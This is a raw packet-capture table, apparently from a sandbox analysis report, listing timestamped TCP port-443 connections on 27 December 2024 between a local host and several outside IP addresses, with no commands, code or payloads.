                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:54.598830938 CET44349930188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:54.598865032 CET49930443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:54.598882914 CET49930443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:54.599208117 CET49930443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:54.599226952 CET44349930188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:54.615993977 CET49940443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:54.616049051 CET44349940188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:54.616218090 CET49940443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:54.616580009 CET49940443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:54.616595984 CET44349940188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:55.674206018 CET49941443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:55.674263000 CET4434994152.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:55.674356937 CET49941443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:55.675116062 CET49941443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:55.675132990 CET4434994152.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:55.678123951 CET49942443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:55.678165913 CET4434994252.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:55.678222895 CET49942443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:55.678493023 CET49942443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:55.678513050 CET4434994252.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.106004953 CET44349940188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.106765032 CET49940443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.112564087 CET49940443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.112576962 CET44349940188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.115335941 CET49940443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.115343094 CET44349940188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.115572929 CET49940443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.115578890 CET44349940188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.273406029 CET44349837162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.273472071 CET44349837162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.273519039 CET49837443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.274946928 CET44349836172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.275017023 CET44349836172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.275077105 CET49836443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.475217104 CET44349842172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.475285053 CET44349842172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.475364923 CET44349841172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.475413084 CET49842443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.475523949 CET44349841172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.475673914 CET49841443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.543349028 CET44349844172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.543418884 CET44349844172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.543482065 CET49844443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.543890953 CET44349846172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.543939114 CET44349846172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.544209003 CET49846443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.547211885 CET49836443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.547240019 CET44349836172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.547269106 CET49844443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.547275066 CET44349844172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.547328949 CET49846443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.547333002 CET44349846172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.547734022 CET49948443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.547743082 CET4434994852.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.547811985 CET49948443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.548266888 CET49948443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.548275948 CET4434994852.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.578254938 CET44349845172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.578315020 CET44349845172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.578499079 CET49845443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.579108953 CET44349847172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.579166889 CET44349847172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.579303026 CET49847443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.669090033 CET49847443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.669138908 CET44349847172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.669153929 CET49845443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.669166088 CET44349845172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.669725895 CET49949443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.669769049 CET4434994952.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.669857979 CET49949443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.670207024 CET49949443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.670223951 CET4434994952.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.789068937 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.789159060 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.789236069 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.790256977 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.790275097 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.838737011 CET44349848172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.838815928 CET44349848172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:56.838937998 CET49848443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.198200941 CET44349940188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.198283911 CET49940443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.198292017 CET44349940188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.198506117 CET49940443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.199750900 CET49940443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.199769974 CET44349940188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.464993000 CET4434994252.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.465327024 CET49942443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.465337992 CET4434994252.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.465826035 CET4434994252.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.466165066 CET49942443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.466253996 CET4434994252.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.466370106 CET49942443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.466429949 CET49942443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.466464043 CET4434994252.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.735867023 CET4434994152.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.736181974 CET49941443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.736187935 CET4434994152.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.736743927 CET4434994152.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.737112999 CET49941443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.737176895 CET4434994152.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.737391949 CET49941443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.737500906 CET49941443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.737525940 CET4434994152.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.739556074 CET49950443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.739578962 CET44349950188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.739672899 CET49950443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.739908934 CET49950443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:57.739922047 CET44349950188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.206804991 CET4434994852.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.207139015 CET49948443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.207153082 CET4434994852.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.208221912 CET4434994852.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.208317041 CET49948443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.208704948 CET49948443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.208766937 CET4434994852.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.208897114 CET49948443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.208903074 CET4434994852.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.208926916 CET49948443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.208971977 CET4434994852.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.257525921 CET49948443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.263638973 CET4434994952.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.264092922 CET49949443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.264106035 CET4434994952.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.265170097 CET4434994952.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.265265942 CET49949443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.265589952 CET49949443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.265669107 CET4434994952.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.265876055 CET49949443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.265876055 CET49949443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.265892982 CET4434994952.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.265918016 CET4434994952.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.306548119 CET4434994252.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.306737900 CET4434994252.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.306890011 CET49942443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.307216883 CET49942443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.307233095 CET4434994252.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.307244062 CET49942443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.307286024 CET49942443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.319540977 CET49949443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.393718004 CET4434994152.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.393980980 CET4434994152.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.394059896 CET49941443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.394581079 CET49941443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.394597054 CET4434994152.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.394684076 CET49941443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.394712925 CET49941443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.778808117 CET49955443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.778867006 CET44349955188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.779028893 CET49955443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.779400110 CET49955443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.779412031 CET44349955188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.843666077 CET4434994952.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.843895912 CET4434994852.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.844059944 CET4434994952.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.844178915 CET4434994852.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.844198942 CET49949443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.844286919 CET49948443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.844494104 CET49949443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.844494104 CET49949443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.844511986 CET4434994952.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.844635963 CET49949443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.846405983 CET49948443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:58.846410036 CET4434994852.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:59.450927019 CET44349950188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:59.451137066 CET49950443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:59.451673985 CET49950443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:59.451682091 CET44349950188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:59.453712940 CET49950443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:59.453717947 CET44349950188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:59.453753948 CET49950443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:59.453758955 CET44349950188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:00.181432962 CET44349955188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:00.181524992 CET49955443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:00.181982994 CET49955443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:00.181993961 CET44349955188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:00.183847904 CET49955443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:00.183854103 CET44349955188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:00.517093897 CET44349950188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:00.517193079 CET44349950188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:00.517385960 CET49950443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:00.518369913 CET49950443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:00.518384933 CET44349950188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:01.058974028 CET44349955188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:01.059042931 CET49955443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:01.059050083 CET44349955188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:01.059103012 CET49955443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:01.060106039 CET49955443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:01.060117006 CET44349955188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:01.873872042 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:01.873903990 CET44349962188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:01.874124050 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:01.874651909 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:01.874666929 CET44349962188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:02.645643950 CET4434986123.44.201.11192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:02.645714998 CET4434986123.44.201.11192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:02.645879030 CET49861443192.168.2.523.44.201.11
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.248609066 CET4434987023.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.248706102 CET4434987023.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.248764992 CET49870443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.319143057 CET44349962188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.319250107 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.320101976 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.320110083 CET44349962188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.327703953 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.327709913 CET44349962188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.327790976 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.327805042 CET44349962188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.327876091 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.327892065 CET44349962188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.327903986 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.327913046 CET44349962188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.328027964 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.328048944 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.328113079 CET44349962188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.328182936 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.328193903 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.328385115 CET44349962188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:03.328685045 CET44349962188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:04.159332991 CET49848443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:04.159347057 CET44349848172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:04.159414053 CET49870443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:04.159435034 CET4434987023.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:04.159605026 CET49861443192.168.2.523.44.201.11
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:04.159615993 CET4434986123.44.201.11192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:05.077166080 CET44349962188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:05.077250004 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:05.077263117 CET44349962188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:05.077311039 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:05.077346087 CET44349962188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:05.077442884 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:05.077627897 CET49962443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:05.077636003 CET44349962188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:05.160348892 CET49972443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:05.160363913 CET44349972188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:05.160443068 CET49972443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:05.160691977 CET49972443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:05.160701036 CET44349972188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:06.614595890 CET44349972188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:06.614694118 CET49972443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:06.615436077 CET49972443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:06.615443945 CET44349972188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:06.617306948 CET49972443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:06.617312908 CET44349972188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.608510017 CET44349972188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.608572960 CET49972443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.608584881 CET44349972188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.608706951 CET44349972188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.608735085 CET49972443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.608756065 CET49972443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.608901024 CET49972443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.608908892 CET44349972188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.611809969 CET49979443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.611840963 CET44349979188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.611915112 CET49979443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.614507914 CET49979443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.614521980 CET44349979188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.853893995 CET4434989823.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.853976965 CET4434989823.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.854072094 CET49898443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.855940104 CET4434989923.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.856018066 CET4434989923.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:07.856076956 CET49899443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:21:09.140564919 CET44349979188.245.216.205192.168.2.5
